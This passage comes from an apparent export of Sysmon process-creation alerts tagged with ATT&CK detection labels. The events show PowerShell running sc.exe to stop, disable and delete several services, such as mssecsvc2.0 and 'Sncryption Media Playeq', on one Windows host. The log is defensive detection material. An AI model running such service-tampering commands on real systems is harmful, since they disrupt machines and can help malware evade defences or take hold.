mssecsvc2.0\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.747"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-00101b422600}"",""processId"":""1144"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.0"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.657",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.677 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00102b3f2600} +ProcessId: 5692 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.681957600Z"",""eventRecordID"":""2931"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.677\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00102b3f2600}\r\nProcessId: 5692\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.677"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-00102b3f2600}"",""processId"":""5692"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.653",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.604 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010c3382600} +ProcessId: 5044 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config mssecsvc2.1 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config mssecsvc2.1 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.608856800Z"",""eventRecordID"":""2930"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.604\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010c3382600}\r\nProcessId: 5044\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config mssecsvc2.1 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.604"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-0010c3382600}"",""processId"":""5044"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config mssecsvc2.1 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.580",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.341 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-001088242600} +ProcessId: 5844 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.357594400Z"",""eventRecordID"":""2927"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.341\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-001088242600}\r\nProcessId: 5844\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.341"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-001088242600}"",""processId"":""5844"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.525",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.261 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010d9212600} +ProcessId: 5996 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SxS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SxS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.264794200Z"",""eventRecordID"":""2924"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.261\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010d9212600}\r\nProcessId: 5996\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SxS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.261"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-0010d9212600}"",""processId"":""5996"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SxS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.496",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.144 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010a41f2600} +ProcessId: 7528 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ""Sncryption Media Playeq"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete \""Sncryption Media Playeq\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.181005800Z"",""eventRecordID"":""2922"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.144\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010a41f2600}\r\nProcessId: 7528\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete \""Sncryption Media Playeq\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.144"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-0010a41f2600}"",""processId"":""7528"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete \\\""Sncryption Media Playeq\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.484",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.088 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010f51d2600} +ProcessId: 1412 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Sncryption Media Playeq"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.094939800Z"",""eventRecordID"":""2921"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.088\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010f51d2600}\r\nProcessId: 1412\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 